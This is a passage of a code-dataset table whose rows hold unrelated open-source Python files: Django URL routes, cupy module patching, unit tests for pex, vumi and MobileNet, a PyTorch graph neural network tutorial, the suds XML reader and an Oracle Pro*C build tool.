max_stars_repo_path (string, 4-245) | max_stars_repo_name (string, 7-115) | max_stars_count (int64, 101-368k) | id (string, 2-8) | content (string, 6-1.03M) |
---|---|---|---|---|
corehq/apps/userreports/urls.py | dimagilg/commcare-hq | 471 | 12634321 |
from django.conf.urls import include, url
from corehq.apps.userreports.reports.view import (
DownloadUCRStatusView,
ucr_download_job_poll,
)
from corehq.apps.userreports.views import (
CreateConfigReportView,
CreateDataSourceFromAppView,
CreateDataSourceView,
DataSourceDebuggerView,
DataSourceSummaryView,
EditConfigReportView,
EditDataSourceView,
ExpressionDebuggerView,
ImportConfigReportView,
PreviewDataSourceView,
UserConfigReportsHomeView,
build_data_source_in_place,
copy_report,
choice_list_api,
data_source_json,
delete_data_source,
delete_report,
evaluate_data_source,
evaluate_expression,
export_data_source,
rebuild_data_source,
report_source_json,
resume_building_data_source,
undelete_data_source,
undelete_report,
update_report_description,
)
urlpatterns = [
url(r'^$', UserConfigReportsHomeView.as_view(),
name=UserConfigReportsHomeView.urlname),
url(r'^reports/create/$', CreateConfigReportView.as_view(),
name=CreateConfigReportView.urlname),
url(r'^reports/import/$', ImportConfigReportView.as_view(),
name=ImportConfigReportView.urlname),
url(r'^reports/edit/(?P<report_id>[\w-]+)/$', EditConfigReportView.as_view(),
name=EditConfigReportView.urlname),
url(r'^reports/source/(?P<report_id>[\w-]+)/$', report_source_json, name='configurable_report_json'),
url(r'^reports/delete/(?P<report_id>[\w-]+)/$', delete_report, name='delete_configurable_report'),
url(r'^reports/undelete/(?P<report_id>[\w-]+)/$', undelete_report, name='undo_delete_configurable_report'),
url(r'^data_sources/create/$', CreateDataSourceView.as_view(),
name=CreateDataSourceView.urlname),
url(r'^data_sources/create_from_app/$', CreateDataSourceFromAppView.as_view(),
name=CreateDataSourceFromAppView.urlname),
url(r'^data_sources/edit/(?P<config_id>[\w-]+)/$', EditDataSourceView.as_view(),
name=EditDataSourceView.urlname),
url(r'^data_sources/source/(?P<config_id>[\w-]+)/$', data_source_json, name='configurable_data_source_json'),
url(r'^data_sources/delete/(?P<config_id>[\w-]+)/$', delete_data_source,
name='delete_configurable_data_source'),
url(r'^data_sources/undelete/(?P<config_id>[\w-]+)/$', undelete_data_source,
name='undo_delete_data_source'),
url(r'^data_sources/rebuild/(?P<config_id>[\w-]+)/$', rebuild_data_source,
name='rebuild_configurable_data_source'),
url(r'^data_sources/resume/(?P<config_id>[\w-]+)/$', resume_building_data_source,
name='resume_build'),
url(r'^data_sources/build_in_place/(?P<config_id>[\w-]+)/$', build_data_source_in_place,
name='build_in_place'),
url(r'^data_sources/preview/(?P<config_id>[\w-]+)/$',
PreviewDataSourceView.as_view(),
name=PreviewDataSourceView.urlname),
url(r'^data_sources/summary/(?P<config_id>[\w-]+)/$',
DataSourceSummaryView.as_view(),
name=DataSourceSummaryView.urlname),
url(r'^data_sources/export/(?P<config_id>[\w-]+)/$', export_data_source,
name='export_configurable_data_source'),
url(r'^expression_debugger/$', ExpressionDebuggerView.as_view(),
name='expression_debugger'),
url(r'^data_source_debugger/$', DataSourceDebuggerView.as_view(),
name='data_source_debugger'),
url(r'^export_status/(?P<download_id>(?:dl-)?[0-9a-fA-Z]{25,32})/(?P<subreport_slug>[\w-]+)/$',
DownloadUCRStatusView.as_view(), name=DownloadUCRStatusView.urlname),
url(r'^export_job_poll/(?P<download_id>(?:dl-)?[0-9a-fA-Z]{25,32})/$',
ucr_download_job_poll, name='ucr_download_job_poll'),
# Update Report Description
url(r'^builder/update_report_description/(?P<report_id>[\w-]+)', update_report_description,
name='update_report_description'),
# apis
url(r'^api/choice_list/(?P<report_id>[\w-]+)/(?P<filter_id>[\w-]+)/$',
choice_list_api, name='choice_list_api'),
url(r'^expression_evaluator/$', evaluate_expression, name='expression_evaluator'),
url(r'^data_source_evaluator/$', evaluate_data_source, name='data_source_evaluator'),
url(r'^aggregate/', include('corehq.apps.aggregate_ucrs.urls')),
url(r'^copy_report/$', copy_report, name='copy_report'),
]
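# Usage sketch (illustrative, not taken from this repo): a project-level
# URLconf would typically mount these patterns under a prefix, e.g.
#
#   from django.conf.urls import include, url
#   urlpatterns = [
#       url(r'^userreports/', include('corehq.apps.userreports.urls')),
#   ]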
|
sporco/cupy/pgm/__init__.py | vishalbelsare/sporco | 217 | 12634355 |
# -*- coding: utf-8 -*-
# Copyright (C) 2018-2020 by <NAME> <<EMAIL>>
# All rights reserved. BSD 3-clause License.
# This file is part of the SPORCO package. Details of the copyright
# and user license can be found in the 'LICENSE.txt' file distributed
# with the package.
"""Construct variant of pgm subpackage that use cupy instead of numpy."""
from __future__ import absolute_import
import sys
import re
from sporco.cupy import sporco_cupy_patch_module
from sporco.cupy import common
from sporco.cupy import linalg
from sporco.cupy import fft
from sporco.cupy import prox
from sporco.cupy import cnvrep
# Construct sporco.cupy.pgm
pgm = sporco_cupy_patch_module('sporco.pgm')
# Construct cupy versions of sporco.pgm auxiliary modules
pgm.backtrack = sporco_cupy_patch_module('sporco.pgm.backtrack')
pgm.momentum = sporco_cupy_patch_module('sporco.pgm.momentum')
pgm.stepsize = sporco_cupy_patch_module('sporco.pgm.stepsize')
# Construct sporco.cupy.pgm.pgm
pgm.pgm = sporco_cupy_patch_module(
'sporco.pgm.pgm',
{'IterativeSolver': common.IterativeSolver,
'rfftn': fft.rfftn, 'irfftn': fft.irfftn,
'BacktrackStandard': pgm.backtrack.BacktrackStandard,
'BacktrackRobust': pgm.backtrack.BacktrackRobust,
'MomentumNesterov': pgm.momentum.MomentumNesterov,
'MomentumLinear': pgm.momentum.MomentumLinear,
'MomentumGenLinear': pgm.momentum.MomentumGenLinear,
'StepSizePolicyCauchy': pgm.stepsize.StepSizePolicyCauchy,
'StepSizePolicyBB': pgm.stepsize.StepSizePolicyBB})
# Record current entries in sys.modules and then replace them with
# patched versions of the modules
sysmod = {}
for mod in ('sporco.common', 'sporco.pgm', 'sporco.pgm.pgm'):
if mod in sys.modules:
sysmod[mod] = sys.modules[mod]
sys.modules['sporco.common'] = common
sys.modules['sporco.pgm'] = pgm
sys.modules['sporco.pgm.pgm'] = pgm.pgm
# Construct sporco.cupy.pgm.cbpdn
pgm.cbpdn = sporco_cupy_patch_module(
'sporco.pgm.cbpdn',
{'pgm': pgm.pgm, 'inner': linalg.inner,
'CSC_ConvRepIndexing': cnvrep.CSC_ConvRepIndexing,
'mskWshape': cnvrep.mskWshape, 'rfftn': fft.rfftn,
'irfftn': fft.irfftn, 'empty_aligned': fft.empty_aligned,
'rfftn_empty_aligned': fft.rfftn_empty_aligned,
'rfl2norm2': fft.rfl2norm2, 'prox_l1': prox.prox_l1})
# Restore original entries in sys.modules
for mod in ('sporco.common', 'sporco.pgm', 'sporco.pgm.pgm'):
if mod in sysmod:
sys.modules[mod] = sysmod[mod]
else:
del sys.modules[mod]
# In sporco.cupy.pgm module, replace original module source path with
# corresponding path in 'sporco/cupy' directory tree
for n, pth in enumerate(sys.modules['sporco.cupy.pgm'].__path__):
pth = re.sub('sporco/', 'sporco/cupy/', pth)
sys.modules['sporco.cupy.pgm'].__path__[n] = pth
|
tools/please_pex/pex_import_test.py | samwestmoreland/please | 1,992 | 12634379 | # Test for importing certain modules with the new incremental pex
# rules. These have proven tricky, seemingly around requests doing
# "from . import utils" etc (which is perfectly fine, and was working
# previously, this just helps investigate & make sure it's fixed).
import unittest
class PexImportTest(unittest.TestCase):
def test_import_requests(self):
"""Test importing Requests."""
from third_party.python import requests
def test_import_dateutil(self):
"""Test importing dateutil."""
from third_party.python.dateutil import parser
if __name__ == '__main__':
unittest.main()
|
ch18/ch18_part1.py | ericgarza70/machine-learning-book | 655 | 12634414 | # coding: utf-8
import sys
from python_environment_check import check_packages
import networkx as nx
import numpy as np
import torch
from torch.nn.parameter import Parameter
import torch.nn.functional as F
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
# # Machine Learning with PyTorch and Scikit-Learn
# # -- Code Examples
# ## Package version checks
# Add folder to path in order to load from the check_packages.py script:
sys.path.insert(0, '..')
# Check recommended package versions:
d = {
'torch': '1.8.0',
'networkx': '2.6.2',
'numpy': '1.21.2',
}
check_packages(d)
# # Chapter 18 - Graph Neural Networks for Capturing Dependencies in Graph Structured Data (Part 1/2)
# - [Introduction to graph data](#Introduction-to-graph-data)
# - [Undirected graphs](#Undirected-graphs)
# - [Directed graphs](#Directed-graphs)
# - [Labeled graphs](#Labeled-graphs)
# - [Representing molecules as graphs](#Representing-molecules-as-graphs)
# - [Understanding graph convolutions](#Understanding-graph-convolutions)
# - [The motivation behind using graph convolutions](#The-motivation-behind-using-graph-convolutions)
# - [Implementing a basic graph convolution](#Implementing-a-basic-graph-convolution)
# - [Implementing a GNN in PyTorch from scratch](#Implementing-a-GNN-in-PyTorch-from-scratch)
# - [Defining the NodeNetwork model](#Defining-the-NodeNetwork-model)
# - [Coding the NodeNetwork’s graph convolution layer](#Coding-the-NodeNetworks-graph-convolution-layer)
# - [Adding a global pooling layer to deal with varying graph sizes](#Adding-a-global-pooling-layer-to-deal-with-varying-graph-sizes)
# - [Preparing the DataLoader](#Preparing-the-DataLoader)
# - [Using the NodeNetwork to make predictions](#Using-the-NodeNetwork-to-make-predictions)
# ## Introduction to graph data
# ### Undirected graphs
# ### Directed graphs
# ### Labeled graphs
# ### Representing molecules as graphs
# ### Understanding graph convolutions
# ### The motivation behind using graph convolutions
# ### Implementing a basic graph convolution
G = nx.Graph()
#Hex codes for colors if we draw graph
blue, orange, green = "#1f77b4", "#ff7f0e","#2ca02c"
G.add_nodes_from([(1, {"color": blue}),
(2, {"color": orange}),
(3, {"color": blue}),
(4, {"color": green})])
G.add_edges_from([(1, 2),(2, 3),(1, 3),(3, 4)])
A = np.asarray(nx.adjacency_matrix(G).todense())
print(A)
def build_graph_color_label_representation(G,mapping_dict):
one_hot_idxs = np.array([mapping_dict[v] for v in
nx.get_node_attributes(G, 'color').values()])
one_hot_encoding = np.zeros((one_hot_idxs.size,len(mapping_dict)))
one_hot_encoding[np.arange(one_hot_idxs.size),one_hot_idxs] = 1
return one_hot_encoding
X = build_graph_color_label_representation(G, {green: 0, blue: 1, orange: 2})
print(X)
color_map = nx.get_node_attributes(G, 'color').values()
nx.draw(G, with_labels=True, node_color=color_map)
f_in, f_out = X.shape[1], 6
W_1 = np.random.rand(f_in, f_out)
W_2 = np.random.rand(f_in, f_out)
h = np.dot(X,W_1) + np.dot(np.dot(A, X), W_2)
# ## Implementing a GNN in PyTorch from scratch
# ### Defining the NodeNetwork model
class NodeNetwork(torch.nn.Module):
def __init__(self, input_features):
super().__init__()
self.conv_1 = BasicGraphConvolutionLayer(input_features, 32)
self.conv_2 = BasicGraphConvolutionLayer(32, 32)
self.fc_1 = torch.nn.Linear(32, 16)
self.out_layer = torch.nn.Linear(16, 2)
def forward(self, X, A,batch_mat):
x = self.conv_1(X, A).clamp(0)
x = self.conv_2(x, A).clamp(0)
output = global_sum_pool(x, batch_mat)
output = self.fc_1(output)
output = self.out_layer(output)
return F.softmax(output, dim=1)
# ### Coding the NodeNetwork’s graph convolution layer
class BasicGraphConvolutionLayer(torch.nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.W2 = Parameter(torch.rand(
(in_channels, out_channels), dtype=torch.float32))
self.W1 = Parameter(torch.rand(
(in_channels, out_channels), dtype=torch.float32))
self.bias = Parameter(torch.zeros(
out_channels, dtype=torch.float32))
def forward(self, X, A):
potential_msgs = torch.mm(X, self.W2)
propagated_msgs = torch.mm(A, potential_msgs)
root_update = torch.mm(X, self.W1)
output = propagated_msgs + root_update + self.bias
return output
# ### Adding a global pooling layer to deal with varying graph sizes
def global_sum_pool(X, batch_mat):
if batch_mat is None or batch_mat.dim() == 1:
return torch.sum(X, dim=0).unsqueeze(0)
else:
return torch.mm(batch_mat, X)
def get_batch_tensor(graph_sizes):
starts = [sum(graph_sizes[:idx]) for idx in range(len(graph_sizes))]
stops = [starts[idx]+graph_sizes[idx] for idx in range(len(graph_sizes))]
tot_len = sum(graph_sizes)
batch_size = len(graph_sizes)
batch_mat = torch.zeros([batch_size, tot_len]).float()
for idx, starts_and_stops in enumerate(zip(starts, stops)):
start = starts_and_stops[0]
stop = starts_and_stops[1]
batch_mat[idx, start:stop] = 1
return batch_mat
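# Example (illustrative): get_batch_tensor([2, 3]) returns the 2x5 mask
#   [[1., 1., 0., 0., 0.],
#    [0., 0., 1., 1., 1.]]
# so torch.mm(batch_mat, X) in global_sum_pool sums node features per graph.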
def collate_graphs(batch):
adj_mats = [graph['A'] for graph in batch]
sizes = [A.size(0) for A in adj_mats]
tot_size = sum(sizes)
# create batch matrix
batch_mat = get_batch_tensor(sizes)
# combine feature matrices
feat_mats = torch.cat([graph['X'] for graph in batch],dim=0)
# combine labels
labels = torch.cat([graph['y'] for graph in batch], dim=0)
# combine adjacency matrices
batch_adj = torch.zeros([tot_size, tot_size], dtype=torch.float32)
accum = 0
for adj in adj_mats:
g_size = adj.shape[0]
batch_adj[accum:accum+g_size, accum:accum+g_size] = adj
accum = accum + g_size
repr_and_label = {
'A': batch_adj,
'X': feat_mats,
'y': labels,
'batch' : batch_mat}
return repr_and_label
# ### Preparing the DataLoader
def get_graph_dict(G, mapping_dict):
# build dictionary representation of graph G
A = torch.from_numpy(np.asarray(nx.adjacency_matrix(G).todense())).float()
# build_graph_color_label_representation() was introduced with the first example graph
X = torch.from_numpy(build_graph_color_label_representation(G,mapping_dict)).float()
# kludge since there is no specific task for this example
y = torch.tensor([[1, 0]]).float()
return {'A': A, 'X': X, 'y': y, 'batch': None}
# building 4 graphs to treat as a dataset
blue, orange, green = "#1f77b4", "#ff7f0e","#2ca02c"
mapping_dict = {green: 0, blue: 1, orange: 2}
G1 = nx.Graph()
G1.add_nodes_from([(1, {"color": blue}),
(2, {"color": orange}),
(3, {"color": blue}),
(4, {"color": green})])
G1.add_edges_from([(1, 2), (2, 3),(1, 3), (3, 4)])
G2 = nx.Graph()
G2.add_nodes_from([(1, {"color": green}),
(2, {"color": green}),
(3, {"color": orange}),
(4, {"color": orange}),
(5,{"color": blue})])
G2.add_edges_from([(2, 3),(3, 4),(3, 1),(5, 1)])
G3 = nx.Graph()
G3.add_nodes_from([(1, {"color": orange}),
(2, {"color": orange}),
(3, {"color": green}),
(4, {"color": green}),
(5, {"color": blue}),
(6, {"color":orange})])
G3.add_edges_from([(2, 3), (3, 4), (3, 1), (5, 1), (2, 5), (6, 1)])
G4 = nx.Graph()
G4.add_nodes_from([(1, {"color": blue}), (2, {"color": blue}), (3, {"color": green})])
G4.add_edges_from([(1, 2), (2, 3)])
graph_list = [get_graph_dict(graph,mapping_dict) for graph in [G1, G2, G3, G4]]
class ExampleDataset(Dataset):
# Simple PyTorch dataset that will use our list of graphs
def __init__(self, graph_list):
self.graphs = graph_list
def __len__(self):
return len(self.graphs)
def __getitem__(self,idx):
mol_rep = self.graphs[idx]
return mol_rep
dset = ExampleDataset(graph_list)
# Note how we use our custom collate function
loader = DataLoader(dset, batch_size=2, shuffle=False, collate_fn=collate_graphs)
# ### Using the NodeNetwork to make predictions
torch.manual_seed(123)
node_features = 3
net = NodeNetwork(node_features)
batch_results = []
for b in loader:
batch_results.append(net(b['X'], b['A'], b['batch']).detach())
G1_rep = dset[1]
G1_single = net(G1_rep['X'], G1_rep['A'], G1_rep['batch']).detach()
G1_batch = batch_results[0][1]
torch.all(torch.isclose(G1_single, G1_batch))
# ---
#
# Readers may ignore the next cell.
|
voctocore/lib/errors/configuration_error.py | 0xflotus/voctomix | 521 | 12634422 |
class ConfigurationError(RuntimeError):
"""Problem in the Configuration"""
|
vumi/transports/tests/test_base.py | seidu626/vumi | 199 | 12634425 |
from twisted.internet.defer import inlineCallbacks
from vumi.tests.helpers import VumiTestCase
from vumi.transports.base import Transport
from vumi.transports.tests.helpers import TransportHelper
from vumi.tests.utils import LogCatcher
class TestBaseTransport(VumiTestCase):
TEST_MIDDLEWARE_CONFIG = {
"middleware": [
{"mw1": "vumi.middleware.tests.utils.RecordingMiddleware"},
{"mw2": "vumi.middleware.tests.utils.RecordingMiddleware"},
],
}
def setUp(self):
self.tx_helper = self.add_helper(TransportHelper(Transport))
@inlineCallbacks
def test_start_transport(self):
tr = yield self.tx_helper.get_transport({})
self.assertEqual(self.tx_helper.transport_name, tr.transport_name)
self.assertTrue(len(tr.connectors) >= 1)
connector = tr.connectors[tr.transport_name]
self.assertTrue(connector._consumers.keys(), set(['outbound']))
self.assertTrue(connector._publishers.keys(),
set(['inbound', 'event']))
self.assertEqual(tr.failure_publisher.routing_key,
'%s.failures' % (tr.transport_name,))
@inlineCallbacks
def test_middleware_for_inbound_messages(self):
transport = yield self.tx_helper.get_transport(
self.TEST_MIDDLEWARE_CONFIG)
orig_msg = self.tx_helper.make_inbound("inbound")
yield transport.publish_message(**orig_msg.payload)
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['record'], [
['mw2', 'inbound', self.tx_helper.transport_name],
['mw1', 'inbound', self.tx_helper.transport_name],
])
@inlineCallbacks
def test_middleware_for_events(self):
transport = yield self.tx_helper.get_transport(
self.TEST_MIDDLEWARE_CONFIG)
orig_msg = self.tx_helper.make_ack()
yield transport.publish_event(**orig_msg.payload)
[msg] = self.tx_helper.get_dispatched_events()
self.assertEqual(msg['record'], [
['mw2', 'event', self.tx_helper.transport_name],
['mw1', 'event', self.tx_helper.transport_name],
])
@inlineCallbacks
def test_middleware_for_failures(self):
transport = yield self.tx_helper.get_transport(
self.TEST_MIDDLEWARE_CONFIG)
orig_msg = self.tx_helper.make_outbound("outbound")
yield transport.send_failure(orig_msg, ValueError(), "dummy_traceback")
[msg] = self.tx_helper.get_dispatched_failures()
self.assertEqual(msg['record'], [
['mw2', 'failure', self.tx_helper.transport_name],
['mw1', 'failure', self.tx_helper.transport_name],
])
@inlineCallbacks
def test_middleware_for_outbound_messages(self):
msgs = []
transport = yield self.tx_helper.get_transport(
self.TEST_MIDDLEWARE_CONFIG)
transport.add_outbound_handler(msgs.append)
yield self.tx_helper.make_dispatch_outbound("outbound")
[msg] = msgs
self.assertEqual(msg['record'], [
('mw1', 'outbound', self.tx_helper.transport_name),
('mw2', 'outbound', self.tx_helper.transport_name),
])
def get_tx_consumers(self, tx):
for connector in tx.connectors.values():
for consumer in connector._consumers.values():
yield consumer
@inlineCallbacks
def test_transport_prefetch_count_custom(self):
transport = yield self.tx_helper.get_transport({
'amqp_prefetch_count': 1,
})
consumers = list(self.get_tx_consumers(transport))
self.assertEqual(1, len(consumers))
for consumer in consumers:
fake_channel = consumer.channel._fake_channel
self.assertEqual(fake_channel.qos_prefetch_count, 1)
@inlineCallbacks
def test_transport_prefetch_count_default(self):
transport = yield self.tx_helper.get_transport({})
consumers = list(self.get_tx_consumers(transport))
self.assertEqual(1, len(consumers))
for consumer in consumers:
fake_channel = consumer.channel._fake_channel
self.assertEqual(fake_channel.qos_prefetch_count, 20)
@inlineCallbacks
def test_add_outbound_handler(self):
transport = yield self.tx_helper.get_transport({})
msgs = []
msg = transport.add_outbound_handler(msgs.append, endpoint_name='foo')
msg = yield self.tx_helper.make_dispatch_outbound(
"outbound", endpoint='foo')
self.assertEqual(msgs, [msg])
@inlineCallbacks
def test_publish_status(self):
transport = yield self.tx_helper.get_transport({
'transport_name': 'foo',
'publish_status': True
})
msg = yield transport.publish_status(
status='down',
component='foo',
type='bar',
message='baz')
self.assertEqual(msg['status'], 'down')
self.assertEqual(msg['component'], 'foo')
self.assertEqual(msg['type'], 'bar')
self.assertEqual(msg['message'], 'baz')
msgs = self.tx_helper.get_dispatched_statuses('foo.status')
self.assertEqual(msgs, [msg])
@inlineCallbacks
def test_publish_status_disabled(self):
transport = yield self.tx_helper.get_transport({
'transport_name': 'foo',
'worker_name': 'foo',
'publish_status': False
})
with LogCatcher() as lc:
msg = yield transport.publish_status(
status='down',
component='foo',
type='bar',
message='baz')
self.assertEqual(msg['status'], 'down')
self.assertEqual(msg['component'], 'foo')
self.assertEqual(msg['type'], 'bar')
self.assertEqual(msg['message'], 'baz')
msgs = self.tx_helper.get_dispatched_statuses('foo.status')
self.assertEqual(msgs, [])
[log] = lc.logs
self.assertEqual(
log['message'][0],
"Status publishing disabled for transport 'foo', "
"ignoring status %r" % (msg,))
self.assertEqual(log['system'], 'foo')
|
suds/reader.py | Ndn1618/interactive-tutorials | 2,750 | 12634462 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: <NAME> ( <EMAIL> )
"""
Contains xml document reader classes.
"""
import hashlib
from logging import getLogger
from suds.sax.parser import Parser
from suds.transport import Request
from suds.cache import NoCache
from suds.store import DocumentStore
from suds.plugin import PluginContainer
log = getLogger(__name__)
class Reader:
"""
The reader provides integration with cache.
@ivar options: An options object.
@type options: I{Options}
"""
def __init__(self, options):
"""
@param options: An options object.
@type options: I{Options}
"""
self.options = options
self.plugins = PluginContainer(options.plugins)
def mangle(self, name, x):
"""
Mangle the name by hashing the I{name} and appending I{x}.
@return: the mangled name.
"""
h = hashlib.sha256(name.encode('utf8')).hexdigest()
return '%s-%s' % (h, x)
class DocumentReader(Reader):
"""
The XML document reader provides an integration
between the SAX L{Parser} and the document cache.
"""
def open(self, url):
"""
Open an XML document at the specified I{url}.
First, an attempt is made to retrieve the document from
the I{object cache}. If not found, it is downloaded and
parsed using the SAX parser. The result is added to the
cache for the next open().
@param url: A document url.
@type url: str.
@return: The specified XML document.
@rtype: I{Document}
"""
cache = self.cache()
id = self.mangle(url, 'document')
d = cache.get(id)
if d is None:
d = self.download(url)
cache.put(id, d)
self.plugins.document.parsed(url=url, document=d.root())
return d
def download(self, url):
"""
Download the document.
@param url: A document url.
@type url: str.
@return: A file pointer to the document.
@rtype: file-like
"""
store = DocumentStore()
fp = store.open(url)
if fp is None:
fp = self.options.transport.open(Request(url))
content = fp.read()
fp.close()
ctx = self.plugins.document.loaded(url=url, document=content)
content = ctx.document
sax = Parser()
return sax.parse(string=content)
def cache(self):
"""
Get the cache.
@return: The I{options} when I{cachingpolicy} = B{0}.
@rtype: L{Cache}
"""
if self.options.cachingpolicy == 0:
return self.options.cache
else:
return NoCache()
class DefinitionsReader(Reader):
"""
The WSDL definitions reader provides an integration
between the Definitions and the object cache.
@ivar fn: A factory function (constructor) used to
create the object not found in the cache.
@type fn: I{Constructor}
"""
def __init__(self, options, fn):
"""
@param options: An options object.
@type options: I{Options}
@param fn: A factory function (constructor) used to
create the object not found in the cache.
@type fn: I{Constructor}
"""
Reader.__init__(self, options)
self.fn = fn
def open(self, url):
"""
Open a WSDL at the specified I{url}.
First, an attempt is made to retrieve the WSDL from
the I{object cache}. After being unpickled from the cache, the
I{options} attribute is restored.
If not found, it is downloaded and instantiated using the
I{fn} constructor and added to the cache for the next open().
@param url: A WSDL url.
@type url: str.
@return: The WSDL object.
@rtype: I{Definitions}
"""
cache = self.cache()
id = self.mangle(url, 'wsdl')
d = cache.get(id)
if d is None:
d = self.fn(url, self.options)
cache.put(id, d)
else:
d.options = self.options
for imp in d.imports:
imp.imported.options = self.options
return d
def cache(self):
"""
Get the cache.
@return: The I{options} when I{cachingpolicy} = B{1}.
@rtype: L{Cache}
"""
if self.options.cachingpolicy == 1:
return self.options.cache
else:
return NoCache()
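# Usage sketch (assumption; names follow the classes above, not a documented API):
#
#   from suds.options import Options
#   reader = DocumentReader(Options())
#   document = reader.open('http://example.com/service?wsdl')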
|
tools/nets/mobilenet_test.py | wqdun/MobileNet | 1,698 | 12634473 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for MobileNet."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from nets import mobilenet
slim = tf.contrib.slim
class MobileNetTest(tf.test.TestCase):
def testBuild(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, end_points = mobilenet.mobilenet(inputs, num_classes)
self.assertEquals(end_points['MobileNet/conv_ds_2/depthwise_conv'].get_shape().as_list(), [5, 112, 112, 32])
self.assertEquals(end_points['MobileNet/conv_ds_3/depthwise_conv'].get_shape().as_list(), [5, 56, 56, 64])
self.assertEquals(end_points['MobileNet/conv_ds_4/depthwise_conv'].get_shape().as_list(), [5, 56, 56, 128])
self.assertEquals(end_points['MobileNet/conv_ds_5/depthwise_conv'].get_shape().as_list(), [5, 28, 28, 128])
self.assertEquals(end_points['MobileNet/conv_ds_6/depthwise_conv'].get_shape().as_list(), [5, 28, 28, 256])
self.assertEquals(end_points['MobileNet/conv_ds_7/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 256])
self.assertEquals(end_points['MobileNet/conv_ds_8/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512])
self.assertEquals(end_points['MobileNet/conv_ds_9/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512])
self.assertEquals(end_points['MobileNet/conv_ds_10/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512])
self.assertEquals(end_points['MobileNet/conv_ds_11/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512])
self.assertEquals(end_points['MobileNet/conv_ds_12/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512])
self.assertEquals(end_points['MobileNet/conv_ds_13/depthwise_conv'].get_shape().as_list(), [5, 7, 7, 512])
self.assertEquals(end_points['MobileNet/conv_ds_14/depthwise_conv'].get_shape().as_list(), [5, 7, 7, 1024])
self.assertEquals(end_points['squeeze'].get_shape().as_list(), [5, 1024])
self.assertEquals(logits.op.name, 'MobileNet/fc_16/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
def testEvaluation(self):
batch_size = 2
height, width = 224, 224
num_classes = 1000
with self.test_session():
eval_inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = mobilenet.mobilenet(eval_inputs, is_training=False)
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
predictions = tf.argmax(logits, 1)
self.assertListEqual(predictions.get_shape().as_list(), [batch_size])
def testForward(self):
batch_size = 1
height, width = 224, 224
with self.test_session() as sess:
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = mobilenet.mobilenet(inputs)
sess.run(tf.global_variables_initializer())
output = sess.run(logits)
self.assertTrue(output.any())
if __name__ == '__main__':
tf.test.main()
|
lib-src/lv2/suil/waflib/extras/proc.py | joshrose/audacity | 7,892 | 12634580 | #! /usr/bin/env python
# per rosengren 2011
from os import environ, path
from waflib import TaskGen, Utils
def options(opt):
grp = opt.add_option_group('Oracle ProC Options')
grp.add_option('--oracle_home', action='store', default=environ.get('PROC_ORACLE'), help='Path to Oracle installation home (has bin/lib)')
grp.add_option('--tns_admin', action='store', default=environ.get('TNS_ADMIN'), help='Directory containing server list (TNS_NAMES.ORA)')
grp.add_option('--connection', action='store', default='dummy-user/dummy-password@dummy-server', help='Format: user/password@server')
def configure(cnf):
env = cnf.env
if not env.PROC_ORACLE:
env.PROC_ORACLE = cnf.options.oracle_home
if not env.PROC_TNS_ADMIN:
env.PROC_TNS_ADMIN = cnf.options.tns_admin
if not env.PROC_CONNECTION:
env.PROC_CONNECTION = cnf.options.connection
cnf.find_program('proc', var='PROC', path_list=env.PROC_ORACLE + path.sep + 'bin')
def proc(tsk):
env = tsk.env
gen = tsk.generator
inc_nodes = gen.to_incnodes(Utils.to_list(getattr(gen,'includes',[])) + env['INCLUDES'])
cmd = (
[env.PROC] +
['SQLCHECK=SEMANTICS'] +
(['SYS_INCLUDE=(' + ','.join(env.PROC_INCLUDES) + ')']
if env.PROC_INCLUDES else []) +
['INCLUDE=(' + ','.join(
[i.bldpath() for i in inc_nodes]
) + ')'] +
['userid=' + env.PROC_CONNECTION] +
['INAME=' + tsk.inputs[0].bldpath()] +
['ONAME=' + tsk.outputs[0].bldpath()]
)
exec_env = {
'ORACLE_HOME': env.PROC_ORACLE,
'LD_LIBRARY_PATH': env.PROC_ORACLE + path.sep + 'lib',
}
if env.PROC_TNS_ADMIN:
exec_env['TNS_ADMIN'] = env.PROC_TNS_ADMIN
return tsk.exec_command(cmd, env=exec_env)
TaskGen.declare_chain(
name = 'proc',
rule = proc,
ext_in = '.pc',
ext_out = '.c',
)
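# Usage sketch (assumption): in a project wscript this tool would typically be
# loaded and Pro*C sources listed next to C sources, e.g.
#
#   def options(opt):   opt.load('proc', tooldir='waflib/extras')
#   def configure(cnf): cnf.load('proc', tooldir='waflib/extras')
#   def build(bld):     bld.program(source='query.pc main.c', target='app')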
|
descarteslabs/common/tasks/exporttask.py | carderne/descarteslabs-python | 167 | 12634608 | import time
from descarteslabs.client.exceptions import NotFoundError
from descarteslabs.client.services.storage import Storage
from descarteslabs.common.tasks import FutureTask, TransientResultError, TimeoutError
class ExportTask(FutureTask):
"""
